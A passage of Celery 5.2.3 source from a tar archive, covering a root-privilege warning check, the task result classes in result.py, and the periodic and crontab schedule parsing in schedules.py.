groups_with_security_risk): _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize) def _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize): c_force_root = os.environ.get('C_FORCE_ROOT', False) if pickle_or_serialize and not c_force_root: raise SecurityError(ROOT_DISALLOWED.format( uid=uid, euid=euid, gid=gid, egid=egid, )) warnings.warn(SecurityWarning(ROOT_DISCOURAGED.format( uid=uid, euid=euid, gid=gid, egid=egid, ))) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/result.py0000664000175000017500000010260300000000000016052 0ustar00asifasif00000000000000"""Task results/state and results for groups of tasks.""" import datetime import time from collections import deque from contextlib import contextmanager from weakref import proxy from kombu.utils.objects import cached_property from vine import Thenable, barrier, promise from . import current_app, states from ._state import _set_task_join_will_block, task_join_will_block from .app import app_or_default from .exceptions import ImproperlyConfigured, IncompleteStream, TimeoutError from .utils.graph import DependencyGraph, GraphFormatter from .utils.iso8601 import parse_iso8601 try: import tblib except ImportError: tblib = None __all__ = ( 'ResultBase', 'AsyncResult', 'ResultSet', 'GroupResult', 'EagerResult', 'result_from_tuple', ) E_WOULDBLOCK = """\ Never call result.get() within a task! See http://docs.celeryq.org/en/latest/userguide/tasks.html\ #task-synchronous-subtasks """ def assert_will_not_block(): if task_join_will_block(): raise RuntimeError(E_WOULDBLOCK) @contextmanager def allow_join_result(): reset_value = task_join_will_block() _set_task_join_will_block(False) try: yield finally: _set_task_join_will_block(reset_value) @contextmanager def denied_join_result(): reset_value = task_join_will_block() _set_task_join_will_block(True) try: yield finally: _set_task_join_will_block(reset_value) class ResultBase: """Base class for results.""" #: Parent result (if part of a chain) parent = None @Thenable.register class AsyncResult(ResultBase): """Query task state. Arguments: id (str): See :attr:`id`. backend (Backend): See :attr:`backend`. """ app = None #: Error raised for timeouts. TimeoutError = TimeoutError #: The task's UUID. id = None #: The task result backend to use. backend = None def __init__(self, id, backend=None, task_name=None, # deprecated app=None, parent=None): if id is None: raise ValueError( f'AsyncResult requires valid id, not {type(id)}') self.app = app_or_default(app or self.app) self.id = id self.backend = backend or self.app.backend self.parent = parent self.on_ready = promise(self._on_fulfilled, weak=True) self._cache = None self._ignored = False @property def ignored(self): """If True, task result retrieval is disabled.""" if hasattr(self, '_ignored'): return self._ignored return False @ignored.setter def ignored(self, value): """Enable/disable task result retrieval.""" self._ignored = value def then(self, callback, on_error=None, weak=False): self.backend.add_pending_result(self, weak=weak) return self.on_ready.then(callback, on_error) def _on_fulfilled(self, result): self.backend.remove_pending_result(self) return result def as_tuple(self): parent = self.parent return (self.id, parent and parent.as_tuple()), None def as_list(self): """Return as a list of task IDs.""" results = [] parent = self.parent results.append(self.id) if parent is not None: results.extend(parent.as_list()) return results def forget(self): """Forget the result of this task and its parents.""" self._cache = None if self.parent: self.parent.forget() self.backend.forget(self.id) def revoke(self, connection=None, terminate=False, signal=None, wait=False, timeout=None): """Send revoke signal to all workers. Any worker receiving the task, or having reserved the task, *must* ignore it. Arguments: terminate (bool): Also terminate the process currently working on the task (if any). signal (str): Name of signal to send to process if terminate. Default is TERM. wait (bool): Wait for replies from workers. The ``timeout`` argument specifies the seconds to wait. Disabled by default. timeout (float): Time in seconds to wait for replies when ``wait`` is enabled. """ self.app.control.revoke(self.id, connection=connection, terminate=terminate, signal=signal, reply=wait, timeout=timeout) def get(self, timeout=None, propagate=True, interval=0.5, no_ack=True, follow_parents=True, callback=None, on_message=None, on_interval=None, disable_sync_subtasks=True, EXCEPTION_STATES=states.EXCEPTION_STATES, PROPAGATE_STATES=states.PROPAGATE_STATES): """Wait until task is ready, and return its result. Warning: Waiting for tasks within a task may lead to deadlocks. Please read :ref:`task-synchronous-subtasks`. Warning: Backends use resources to store and transmit results. To ensure that resources are released, you must eventually call :meth:`~@AsyncResult.get` or :meth:`~@AsyncResult.forget` on EVERY :class:`~@AsyncResult` instance returned after calling a task. Arguments: timeout (float): How long to wait, in seconds, before the operation times out. propagate (bool): Re-raise exception if the task failed. interval (float): Time to wait (in seconds) before retrying to retrieve the result. Note that this does not have any effect when using the RPC/redis result store backends, as they don't use polling. no_ack (bool): Enable amqp no ack (automatically acknowledge message). If this is :const:`False` then the message will **not be acked**. follow_parents (bool): Re-raise any exception raised by parent tasks. disable_sync_subtasks (bool): Disable tasks to wait for sub tasks this is the default configuration. CAUTION do not enable this unless you must. Raises: celery.exceptions.TimeoutError: if `timeout` isn't :const:`None` and the result does not arrive within `timeout` seconds. Exception: If the remote call raised an exception then that exception will be re-raised in the caller process. """ if self.ignored: return if disable_sync_subtasks: assert_will_not_block() _on_interval = promise() if follow_parents and propagate and self.parent: _on_interval = promise(self._maybe_reraise_parent_error, weak=True) self._maybe_reraise_parent_error() if on_interval: _on_interval.then(on_interval) if self._cache: if propagate: self.maybe_throw(callback=callback) return self.result self.backend.add_pending_result(self) return self.backend.wait_for_pending( self, timeout=timeout, interval=interval, on_interval=_on_interval, no_ack=no_ack, propagate=propagate, callback=callback, on_message=on_message, ) wait = get # deprecated alias to :meth:`get`. def _maybe_reraise_parent_error(self): for node in reversed(list(self._parents())): node.maybe_throw() def _parents(self): node = self.parent while node: yield node node = node.parent def collect(self, intermediate=False, **kwargs): """Collect results as they return. Iterator, like :meth:`get` will wait for the task to complete, but will also follow :class:`AsyncResult` and :class:`ResultSet` returned by the task, yielding ``(result, value)`` tuples for each result in the tree. An example would be having the following tasks: .. code-block:: python from celery import group from proj.celery import app @app.task(trail=True) def A(how_many): return group(B.s(i) for i in range(how_many))() @app.task(trail=True) def B(i): return pow2.delay(i) @app.task(trail=True) def pow2(i): return i ** 2 .. code-block:: pycon >>> from celery.result import ResultBase >>> from proj.tasks import A >>> result = A.delay(10) >>> [v for v in result.collect() ... if not isinstance(v, (ResultBase, tuple))] [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] Note: The ``Task.trail`` option must be enabled so that the list of children is stored in ``result.children``. This is the default but enabled explicitly for illustration. Yields: Tuple[AsyncResult, Any]: tuples containing the result instance of the child task, and the return value of that task. """ for _, R in self.iterdeps(intermediate=intermediate): yield R, R.get(**kwargs) def get_leaf(self): value = None for _, R in self.iterdeps(): value = R.get() return value def iterdeps(self, intermediate=False): stack = deque([(None, self)]) while stack: parent, node = stack.popleft() yield parent, node if node.ready(): stack.extend((node, child) for child in node.children or []) else: if not intermediate: raise IncompleteStream() def ready(self): """Return :const:`True` if the task has executed. If the task is still running, pending, or is waiting for retry then :const:`False` is returned. """ return self.state in self.backend.READY_STATES def successful(self): """Return :const:`True` if the task executed successfully.""" return self.state == states.SUCCESS def failed(self): """Return :const:`True` if the task failed.""" return self.state == states.FAILURE def throw(self, *args, **kwargs): self.on_ready.throw(*args, **kwargs) def maybe_throw(self, propagate=True, callback=None): cache = self._get_task_meta() if self._cache is None else self._cache state, value, tb = ( cache['status'], cache['result'], cache.get('traceback')) if state in states.PROPAGATE_STATES and propagate: self.throw(value, self._to_remote_traceback(tb)) if callback is not None: callback(self.id, value) return value maybe_reraise = maybe_throw # XXX compat alias def _to_remote_traceback(self, tb): if tb and tblib is not None and self.app.conf.task_remote_tracebacks: return tblib.Traceback.from_string(tb).as_traceback() def build_graph(self, intermediate=False, formatter=None): graph = DependencyGraph( formatter=formatter or GraphFormatter(root=self.id, shape='oval'), ) for parent, node in self.iterdeps(intermediate=intermediate): graph.add_arc(node) if parent: graph.add_edge(parent, node) return graph def __str__(self): """`str(self) -> self.id`.""" return str(self.id) def __hash__(self): """`hash(self) -> hash(self.id)`.""" return hash(self.id) def __repr__(self): return f'<{type(self).__name__}: {self.id}>' def __eq__(self, other): if isinstance(other, AsyncResult): return other.id == self.id elif isinstance(other, str): return other == self.id return NotImplemented def __ne__(self, other): res = self.__eq__(other) return True if res is NotImplemented else not res def __copy__(self): return self.__class__( self.id, self.backend, None, self.app, self.parent, ) def __reduce__(self): return self.__class__, self.__reduce_args__() def __reduce_args__(self): return self.id, self.backend, None, None, self.parent def __del__(self): """Cancel pending operations when the instance is destroyed.""" if self.backend is not None: self.backend.remove_pending_result(self) @cached_property def graph(self): return self.build_graph() @property def supports_native_join(self): return self.backend.supports_native_join @property def children(self): return self._get_task_meta().get('children') def _maybe_set_cache(self, meta): if meta: state = meta['status'] if state in states.READY_STATES: d = self._set_cache(self.backend.meta_from_decoded(meta)) self.on_ready(self) return d return meta def _get_task_meta(self): if self._cache is None: return self._maybe_set_cache(self.backend.get_task_meta(self.id)) return self._cache def _iter_meta(self, **kwargs): return iter([self._get_task_meta()]) def _set_cache(self, d): children = d.get('children') if children: d['children'] = [ result_from_tuple(child, self.app) for child in children ] self._cache = d return d @property def result(self): """Task return value. Note: When the task has been executed, this contains the return value. If the task raised an exception, this will be the exception instance. """ return self._get_task_meta()['result'] info = result @property def traceback(self): """Get the traceback of a failed task.""" return self._get_task_meta().get('traceback') @property def state(self): """The tasks current state. Possible values includes: *PENDING* The task is waiting for execution. *STARTED* The task has been started. *RETRY* The task is to be retried, possibly because of failure. *FAILURE* The task raised an exception, or has exceeded the retry limit. The :attr:`result` attribute then contains the exception raised by the task. *SUCCESS* The task executed successfully. The :attr:`result` attribute then contains the tasks return value. """ return self._get_task_meta()['status'] status = state # XXX compat @property def task_id(self): """Compat. alias to :attr:`id`.""" return self.id @task_id.setter def task_id(self, id): self.id = id @property def name(self): return self._get_task_meta().get('name') @property def args(self): return self._get_task_meta().get('args') @property def kwargs(self): return self._get_task_meta().get('kwargs') @property def worker(self): return self._get_task_meta().get('worker') @property def date_done(self): """UTC date and time.""" date_done = self._get_task_meta().get('date_done') if date_done and not isinstance(date_done, datetime.datetime): return parse_iso8601(date_done) return date_done @property def retries(self): return self._get_task_meta().get('retries') @property def queue(self): return self._get_task_meta().get('queue') @Thenable.register class ResultSet(ResultBase): """A collection of results. Arguments: results (Sequence[AsyncResult]): List of result instances. """ _app = None #: List of results in in the set. results = None def __init__(self, results, app=None, ready_barrier=None, **kwargs): self._app = app self.results = results self.on_ready = promise(args=(proxy(self),)) self._on_full = ready_barrier or barrier(results) if self._on_full: self._on_full.then(promise(self._on_ready, weak=True)) def add(self, result): """Add :class:`AsyncResult` as a new member of the set. Does nothing if the result is already a member. """ if result not in self.results: self.results.append(result) if self._on_full: self._on_full.add(result) def _on_ready(self): if self.backend.is_async: self.on_ready() def remove(self, result): """Remove result from the set; it must be a member. Raises: KeyError: if the result isn't a member. """ if isinstance(result, str): result = self.app.AsyncResult(result) try: self.results.remove(result) except ValueError: raise KeyError(result) def discard(self, result): """Remove result from the set if it is a member. Does nothing if it's not a member. """ try: self.remove(result) except KeyError: pass def update(self, results): """Extend from iterable of results.""" self.results.extend(r for r in results if r not in self.results) def clear(self): """Remove all results from this set.""" self.results[:] = [] # don't create new list. def successful(self): """Return true if all tasks successful. Returns: bool: true if all of the tasks finished successfully (i.e. didn't raise an exception). """ return all(result.successful() for result in self.results) def failed(self): """Return true if any of the tasks failed. Returns: bool: true if one of the tasks failed. (i.e., raised an exception) """ return any(result.failed() for result in self.results) def maybe_throw(self, callback=None, propagate=True): for result in self.results: result.maybe_throw(callback=callback, propagate=propagate) maybe_reraise = maybe_throw # XXX compat alias. def waiting(self): """Return true if any of the tasks are incomplete. Returns: bool: true if one of the tasks are still waiting for execution. """ return any(not result.ready() for result in self.results) def ready(self): """Did all of the tasks complete? (either by success of failure). Returns: bool: true if all of the tasks have been executed. """ return all(result.ready() for result in self.results) def completed_count(self): """Task completion count. Returns: int: the number of tasks completed. """ return sum(int(result.successful()) for result in self.results) def forget(self): """Forget about (and possible remove the result of) all the tasks.""" for result in self.results: result.forget() def revoke(self, connection=None, terminate=False, signal=None, wait=False, timeout=None): """Send revoke signal to all workers for all tasks in the set. Arguments: terminate (bool): Also terminate the process currently working on the task (if any). signal (str): Name of signal to send to process if terminate. Default is TERM. wait (bool): Wait for replies from worker. The ``timeout`` argument specifies the number of seconds to wait. Disabled by default. timeout (float): Time in seconds to wait for replies when the ``wait`` argument is enabled. """ self.app.control.revoke([r.id for r in self.results], connection=connection, timeout=timeout, terminate=terminate, signal=signal, reply=wait) def __iter__(self): return iter(self.results) def __getitem__(self, index): """`res[i] -> res.results[i]`.""" return self.results[index] def get(self, timeout=None, propagate=True, interval=0.5, callback=None, no_ack=True, on_message=None, disable_sync_subtasks=True, on_interval=None): """See :meth:`join`. This is here for API compatibility with :class:`AsyncResult`, in addition it uses :meth:`join_native` if available for the current result backend. """ return (self.join_native if self.supports_native_join else self.join)( timeout=timeout, propagate=propagate, interval=interval, callback=callback, no_ack=no_ack, on_message=on_message, disable_sync_subtasks=disable_sync_subtasks, on_interval=on_interval, ) def join(self, timeout=None, propagate=True, interval=0.5, callback=None, no_ack=True, on_message=None, disable_sync_subtasks=True, on_interval=None): """Gather the results of all tasks as a list in order. Note: This can be an expensive operation for result store backends that must resort to polling (e.g., database). You should consider using :meth:`join_native` if your backend supports it. Warning: Waiting for tasks within a task may lead to deadlocks. Please see :ref:`task-synchronous-subtasks`. Arguments: timeout (float): The number of seconds to wait for results before the operation times out. propagate (bool): If any of the tasks raises an exception, the exception will be re-raised when this flag is set. interval (float): Time to wait (in seconds) before retrying to retrieve a result from the set. Note that this does not have any effect when using the amqp result store backend, as it does not use polling. callback (Callable): Optional callback to be called for every result received. Must have signature ``(task_id, value)`` No results will be returned by this function if a callback is specified. The order of results is also arbitrary when a callback is used. To get access to the result object for a particular id you'll have to generate an index first: ``index = {r.id: r for r in gres.results.values()}`` Or you can create new result objects on the fly: ``result = app.AsyncResult(task_id)`` (both will take advantage of the backend cache anyway). no_ack (bool): Automatic message acknowledgment (Note that if this is set to :const:`False` then the messages *will not be acknowledged*). disable_sync_subtasks (bool): Disable tasks to wait for sub tasks this is the default configuration. CAUTION do not enable this unless you must. Raises: celery.exceptions.TimeoutError: if ``timeout`` isn't :const:`None` and the operation takes longer than ``timeout`` seconds. """ if disable_sync_subtasks: assert_will_not_block() time_start = time.monotonic() remaining = None if on_message is not None: raise ImproperlyConfigured( 'Backend does not support on_message callback') results = [] for result in self.results: remaining = None if timeout: remaining = timeout - (time.monotonic() - time_start) if remaining <= 0.0: raise TimeoutError('join operation timed out') value = result.get( timeout=remaining, propagate=propagate, interval=interval, no_ack=no_ack, on_interval=on_interval, disable_sync_subtasks=disable_sync_subtasks, ) if callback: callback(result.id, value) else: results.append(value) return results def then(self, callback, on_error=None, weak=False): return self.on_ready.then(callback, on_error) def iter_native(self, timeout=None, interval=0.5, no_ack=True, on_message=None, on_interval=None): """Backend optimized version of :meth:`iterate`. .. versionadded:: 2.2 Note that this does not support collecting the results for different task types using different backends. This is currently only supported by the amqp, Redis and cache result backends. """ return self.backend.iter_native( self, timeout=timeout, interval=interval, no_ack=no_ack, on_message=on_message, on_interval=on_interval, ) def join_native(self, timeout=None, propagate=True, interval=0.5, callback=None, no_ack=True, on_message=None, on_interval=None, disable_sync_subtasks=True): """Backend optimized version of :meth:`join`. .. versionadded:: 2.2 Note that this does not support collecting the results for different task types using different backends. This is currently only supported by the amqp, Redis and cache result backends. """ if disable_sync_subtasks: assert_will_not_block() order_index = None if callback else { result.id: i for i, result in enumerate(self.results) } acc = None if callback else [None for _ in range(len(self))] for task_id, meta in self.iter_native(timeout, interval, no_ack, on_message, on_interval): if isinstance(meta, list): value = [] for children_result in meta: value.append(children_result.get()) else: value = meta['result'] if propagate and meta['status'] in states.PROPAGATE_STATES: raise value if callback: callback(task_id, value) else: acc[order_index[task_id]] = value return acc def _iter_meta(self, **kwargs): return (meta for _, meta in self.backend.get_many( {r.id for r in self.results}, max_iterations=1, **kwargs )) def _failed_join_report(self): return (res for res in self.results if res.backend.is_cached(res.id) and res.state in states.PROPAGATE_STATES) def __len__(self): return len(self.results) def __eq__(self, other): if isinstance(other, ResultSet): return other.results == self.results return NotImplemented def __ne__(self, other): res = self.__eq__(other) return True if res is NotImplemented else not res def __repr__(self): return f'<{type(self).__name__}: [{", ".join(r.id for r in self.results)}]>' @property def supports_native_join(self): try: return self.results[0].supports_native_join except IndexError: pass @property def app(self): if self._app is None: self._app = (self.results[0].app if self.results else current_app._get_current_object()) return self._app @app.setter def app(self, app): self._app = app @property def backend(self): return self.app.backend if self.app else self.results[0].backend @Thenable.register class GroupResult(ResultSet): """Like :class:`ResultSet`, but with an associated id. This type is returned by :class:`~celery.group`. It enables inspection of the tasks state and return values as a single entity. Arguments: id (str): The id of the group. results (Sequence[AsyncResult]): List of result instances. parent (ResultBase): Parent result of this group. """ #: The UUID of the group. id = None #: List/iterator of results in the group results = None def __init__(self, id=None, results=None, parent=None, **kwargs): self.id = id self.parent = parent super().__init__(results, **kwargs) def _on_ready(self): self.backend.remove_pending_result(self) super()._on_ready() def save(self, backend=None): """Save group-result for later retrieval using :meth:`restore`. Example: >>> def save_and_restore(result): ... result.save() ... result = GroupResult.restore(result.id) """ return (backend or self.app.backend).save_group(self.id, self) def delete(self, backend=None): """Remove this result if it was previously saved.""" (backend or self.app.backend).delete_group(self.id) def __reduce__(self): return self.__class__, self.__reduce_args__() def __reduce_args__(self): return self.id, self.results def __bool__(self): return bool(self.id or self.results) __nonzero__ = __bool__ # Included for Py2 backwards compatibility def __eq__(self, other): if isinstance(other, GroupResult): return ( other.id == self.id and other.results == self.results and other.parent == self.parent ) elif isinstance(other, str): return other == self.id return NotImplemented def __ne__(self, other): res = self.__eq__(other) return True if res is NotImplemented else not res def __repr__(self): return f'<{type(self).__name__}: {self.id} [{", ".join(r.id for r in self.results)}]>' def __str__(self): """`str(self) -> self.id`.""" return str(self.id) def __hash__(self): """`hash(self) -> hash(self.id)`.""" return hash(self.id) def as_tuple(self): return ( (self.id, self.parent and self.parent.as_tuple()), [r.as_tuple() for r in self.results] ) @property def children(self): return self.results @classmethod def restore(cls, id, backend=None, app=None): """Restore previously saved group result.""" app = app or ( cls.app if not isinstance(cls.app, property) else current_app ) backend = backend or app.backend return backend.restore_group(id) @Thenable.register class EagerResult(AsyncResult): """Result that we know has already been executed.""" def __init__(self, id, ret_value, state, traceback=None): # pylint: disable=super-init-not-called # XXX should really not be inheriting from AsyncResult self.id = id self._result = ret_value self._state = state self._traceback = traceback self.on_ready = promise() self.on_ready(self) def then(self, callback, on_error=None, weak=False): return self.on_ready.then(callback, on_error) def _get_task_meta(self): return self._cache def __reduce__(self): return self.__class__, self.__reduce_args__() def __reduce_args__(self): return (self.id, self._result, self._state, self._traceback) def __copy__(self): cls, args = self.__reduce__() return cls(*args) def ready(self): return True def get(self, timeout=None, propagate=True, disable_sync_subtasks=True, **kwargs): if disable_sync_subtasks: assert_will_not_block() if self.successful(): return self.result elif self.state in states.PROPAGATE_STATES: if propagate: raise self.result if isinstance( self.result, Exception) else Exception(self.result) return self.result wait = get # XXX Compat (remove 5.0) def forget(self): pass def revoke(self, *args, **kwargs): self._state = states.REVOKED def __repr__(self): return f'' @property def _cache(self): return { 'task_id': self.id, 'result': self._result, 'status': self._state, 'traceback': self._traceback, } @property def result(self): """The tasks return value.""" return self._result @property def state(self): """The tasks state.""" return self._state status = state @property def traceback(self): """The traceback if the task failed.""" return self._traceback @property def supports_native_join(self): return False def result_from_tuple(r, app=None): """Deserialize result from tuple.""" # earlier backends may just pickle, so check if # result is already prepared. app = app_or_default(app) Result = app.AsyncResult if not isinstance(r, ResultBase): res, nodes = r id, parent = res if isinstance(res, (list, tuple)) else (res, None) if parent: parent = result_from_tuple(parent, app) if nodes is not None: return app.GroupResult( id, [result_from_tuple(child, app) for child in nodes], parent=parent, ) return Result(id, parent=parent) return r ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/schedules.py0000664000175000017500000007110300000000000016513 0ustar00asifasif00000000000000"""Schedules define the intervals at which periodic tasks run.""" import numbers import re from bisect import bisect, bisect_left from collections import namedtuple from collections.abc import Iterable from datetime import datetime, timedelta from kombu.utils.objects import cached_property from . import current_app from .utils.collections import AttributeDict from .utils.time import (ffwd, humanize_seconds, localize, maybe_make_aware, maybe_timedelta, remaining, timezone, weekday) __all__ = ( 'ParseException', 'schedule', 'crontab', 'crontab_parser', 'maybe_schedule', 'solar', ) schedstate = namedtuple('schedstate', ('is_due', 'next')) CRON_PATTERN_INVALID = """\ Invalid crontab pattern. Valid range is {min}-{max}. \ '{value}' was found.\ """ CRON_INVALID_TYPE = """\ Argument cronspec needs to be of any of the following types: \ int, str, or an iterable type. {type!r} was given.\ """ CRON_REPR = """\ \ """ SOLAR_INVALID_LATITUDE = """\ Argument latitude {lat} is invalid, must be between -90 and 90.\ """ SOLAR_INVALID_LONGITUDE = """\ Argument longitude {lon} is invalid, must be between -180 and 180.\ """ SOLAR_INVALID_EVENT = """\ Argument event "{event}" is invalid, must be one of {all_events}.\ """ def cronfield(s): return '*' if s is None else s class ParseException(Exception): """Raised by :class:`crontab_parser` when the input can't be parsed.""" class BaseSchedule: def __init__(self, nowfun=None, app=None): self.nowfun = nowfun self._app = app def now(self): return (self.nowfun or self.app.now)() def remaining_estimate(self, last_run_at): raise NotImplementedError() def is_due(self, last_run_at): raise NotImplementedError() def maybe_make_aware(self, dt): return maybe_make_aware(dt, self.tz) @property def app(self): return self._app or current_app._get_current_object() @app.setter def app(self, app): self._app = app @cached_property def tz(self): return self.app.timezone @cached_property def utc_enabled(self): return self.app.conf.enable_utc def to_local(self, dt): if not self.utc_enabled: return timezone.to_local_fallback(dt) return dt def __eq__(self, other): if isinstance(other, BaseSchedule): return other.nowfun == self.nowfun return NotImplemented class schedule(BaseSchedule): """Schedule for periodic task. Arguments: run_every (float, ~datetime.timedelta): Time interval. relative (bool): If set to True the run time will be rounded to the resolution of the interval. nowfun (Callable): Function returning the current date and time (:class:`~datetime.datetime`). app (Celery): Celery app instance. """ relative = False def __init__(self, run_every=None, relative=False, nowfun=None, app=None): self.run_every = maybe_timedelta(run_every) self.relative = relative super().__init__(nowfun=nowfun, app=app) def remaining_estimate(self, last_run_at): return remaining( self.maybe_make_aware(last_run_at), self.run_every, self.maybe_make_aware(self.now()), self.relative, ) def is_due(self, last_run_at): """Return tuple of ``(is_due, next_time_to_check)``. Notes: - next time to check is in seconds. - ``(True, 20)``, means the task should be run now, and the next time to check is in 20 seconds. - ``(False, 12.3)``, means the task is not due, but that the scheduler should check again in 12.3 seconds. The next time to check is used to save energy/CPU cycles, it does not need to be accurate but will influence the precision of your schedule. You must also keep in mind the value of :setting:`beat_max_loop_interval`, that decides the maximum number of seconds the scheduler can sleep between re-checking the periodic task intervals. So if you have a task that changes schedule at run-time then your next_run_at check will decide how long it will take before a change to the schedule takes effect. The max loop interval takes precedence over the next check at value returned. .. admonition:: Scheduler max interval variance The default max loop interval may vary for different schedulers. For the default scheduler the value is 5 minutes, but for example the :pypi:`django-celery-beat` database scheduler the value is 5 seconds. """ last_run_at = self.maybe_make_aware(last_run_at) rem_delta = self.remaining_estimate(last_run_at) remaining_s = max(rem_delta.total_seconds(), 0) if remaining_s == 0: return schedstate(is_due=True, next=self.seconds) return schedstate(is_due=False, next=remaining_s) def __repr__(self): return f'' def __eq__(self, other): if isinstance(other, schedule): return self.run_every == other.run_every return self.run_every == other def __ne__(self, other): return not self.__eq__(other) def __reduce__(self): return self.__class__, (self.run_every, self.relative, self.nowfun) @property def seconds(self): return max(self.run_every.total_seconds(), 0) @property def human_seconds(self): return humanize_seconds(self.seconds) class crontab_parser: """Parser for Crontab expressions. Any expression of the form 'groups' (see BNF grammar below) is accepted and expanded to a set of numbers. These numbers represent the units of time that the Crontab needs to run on: .. code-block:: bnf digit :: '0'..'9' dow :: 'a'..'z' number :: digit+ | dow+ steps :: number range :: number ( '-' number ) ? numspec :: '*' | range expr :: numspec ( '/' steps ) ? groups :: expr ( ',' expr ) * The parser is a general purpose one, useful for parsing hours, minutes and day of week expressions. Example usage: .. code-block:: pycon >>> minutes = crontab_parser(60).parse('*/15') [0, 15, 30, 45] >>> hours = crontab_parser(24).parse('*/4') [0, 4, 8, 12, 16, 20] >>> day_of_week = crontab_parser(7).parse('*') [0, 1, 2, 3, 4, 5, 6] It can also parse day of month and month of year expressions if initialized with a minimum of 1. Example usage: .. code-block:: pycon >>> days_of_month = crontab_parser(31, 1).parse('*/3') [1, 4, 7, 10, 13, 16, 19, 22, 25, 28, 31] >>> months_of_year = crontab_parser(12, 1).parse('*/2') [1, 3, 5, 7, 9, 11] >>> months_of_year = crontab_parser(12, 1).parse('2-12/2') [2, 4, 6, 8, 10, 12] The maximum possible expanded value returned is found by the formula: :math:`max_ + min_ - 1` """ ParseException = ParseException _range = r'(\w+?)-(\w+)' _steps = r'/(\w+)?' _star = r'\*' def __init__(self, max_=60, min_=0): self.max_ = max_ self.min_ = min_ self.pats = ( (re.compile(self._range + self._steps), self._range_steps), (re.compile(self._range), self._expand_range), (re.compile(self._star + self._steps), self._star_steps), (re.compile('^' + self._star + '$'), self._expand_star), ) def parse(self, spec): acc = set() for part in spec.split(','): if not part: raise self.ParseException('empty part') acc |= set(self._parse_part(part)) return acc def _parse_part(self, part): for regex, handler in self.pats: m = regex.match(part) if m: return handler(m.groups()) return self._expand_range((part,)) def _expand_range(self, toks): fr = self._expand_number(toks[0]) if len(toks) > 1: to = self._expand_number(toks[1]) if to < fr: # Wrap around max_ if necessary return (list(range(fr, self.min_ + self.max_)) + list(range(self.min_, to + 1))) return list(range(fr, to + 1)) return [fr] def _range_steps(self, toks): if len(toks) != 3 or not toks[2]: raise self.ParseException('empty filter') return self._expand_range(toks[:2])[::int(toks[2])] def _star_steps(self, toks): if not toks or not toks[0]: raise self.ParseException('empty filter') return self._expand_star()[::int(toks[0])] def _expand_star(self, *args): return list(range(self.min_, self.max_ + self.min_)) def _expand_number(self, s): if isinstance(s, str) and s[0] == '-': raise self.ParseException('negative numbers not supported') try: i = int(s) except ValueError: try: i = weekday(s) except KeyError: raise ValueError(f'Invalid weekday literal {s!r}.') max_val = self.min_ + self.max_ - 1 if i > max_val: raise ValueError( f'Invalid end range: {i} > {max_val}.') if i < self.min_: raise ValueError( f'Invalid beginning range: {i} < {self.min_}.') return i class crontab(BaseSchedule): """Crontab schedule. A Crontab can be used as the ``run_every`` value of a periodic task entry to add :manpage:`crontab(5)`-like scheduling. Like a :manpage:`cron(5)`-job, you can specify units of time of when you'd like the task to execute. It's a reasonably complete implementation of :command:`cron`'s features, so it should provide a fair degree of scheduling needs. You can specify a minute, an hour, a day of the week, a day of the month, and/or a month in the year in any of the following formats: .. attribute:: minute - A (list of) integers from 0-59 that represent the minutes of an hour of when execution should occur; or - A string representing a Crontab pattern. This may get pretty advanced, like ``minute='*/15'`` (for every quarter) or ``minute='1,13,30-45,50-59/2'``. .. attribute:: hour - A (list of) integers from 0-23 that represent the hours of a day of when execution should occur; or - A string representing a Crontab pattern. This may get pretty advanced, like ``hour='*/3'`` (for every three hours) or ``hour='0,8-17/2'`` (at midnight, and every two hours during office hours). .. attribute:: day_of_week - A (list of) integers from 0-6, where Sunday = 0 and Saturday = 6, that represent the days of a week that execution should occur. - A string representing a Crontab pattern. This may get pretty advanced, like ``day_of_week='mon-fri'`` (for weekdays only). (Beware that ``day_of_week='*/2'`` does not literally mean 'every two days', but 'every day that is divisible by two'!) .. attribute:: day_of_month - A (list of) integers from 1-31 that represents the days of the month that execution should occur. - A string representing a Crontab pattern. This may get pretty advanced, such as ``day_of_month='2-30/2'`` (for every even numbered day) or ``day_of_month='1-7,15-21'`` (for the first and third weeks of the month). .. attribute:: month_of_year - A (list of) integers from 1-12 that represents the months of the year during which execution can occur. - A string representing a Crontab pattern. This may get pretty advanced, such as ``month_of_year='*/3'`` (for the first month of every quarter) or ``month_of_year='2-12/2'`` (for every even numbered month). .. attribute:: nowfun Function returning the current date and time (:class:`~datetime.datetime`). .. attribute:: app The Celery app instance. It's important to realize that any day on which execution should occur must be represented by entries in all three of the day and month attributes. For example, if ``day_of_week`` is 0 and ``day_of_month`` is every seventh day, only months that begin on Sunday and are also in the ``month_of_year`` attribute will have execution events. Or, ``day_of_week`` is 1 and ``day_of_month`` is '1-7,15-21' means every first and third Monday of every month present in ``month_of_year``. """ def __init__(self, minute='*', hour='*', day_of_week='*', day_of_month='*', month_of_year='*', **kwargs): self._orig_minute = cronfield(minute) self._orig_hour = cronfield(hour) self._orig_day_of_week = cronfield(day_of_week) self._orig_day_of_month = cronfield(day_of_month) self._orig_month_of_year = cronfield(month_of_year) self._orig_kwargs = kwargs self.hour = self._expand_cronspec(hour, 24) self.minute = self._expand_cronspec(minute, 60) self.day_of_week = self._expand_cronspec(day_of_week, 7) self.day_of_month = self._expand_cronspec(day_of_month, 31, 1) self.month_of_year = self._expand_cronspec(month_of_year, 12, 1) super().__init__(**kwargs) @staticmethod def _expand_cronspec(cronspec, max_, min_=0): """Expand cron specification. Takes the given cronspec argument in one of the forms: .. code-block:: text int (like 7) str (like '3-5,*/15', '*', or 'monday') set (like {0,15,30,45} list (like [8-17]) And convert it to an (expanded) set representing all time unit values on which the Crontab triggers. Only in case of the base type being :class:`str`, parsing occurs. (It's fast and happens only once for each Crontab instance, so there's no significant performance overhead involved.) For the other base types, merely Python type conversions happen. The argument ``max_`` is needed to determine the expansion of ``*`` and ranges. The argument ``min_`` is needed to determine the expansion of ``*`` and ranges for 1-based cronspecs, such as day of month or month of year. The default is sufficient for minute, hour, and day of week. """ if isinstance(cronspec, numbers.Integral): result = {cronspec} elif isinstance(cronspec, str): result = crontab_parser(max_, min_).parse(cronspec) elif isinstance(cronspec, set): result = cronspec elif isinstance(cronspec, Iterable): result = set(cronspec) else: raise TypeError(CRON_INVALID_TYPE.format(type=type(cronspec))) # assure the result does not preceed the min or exceed the max for number in result: if number >= max_ + min_ or number < min_: raise 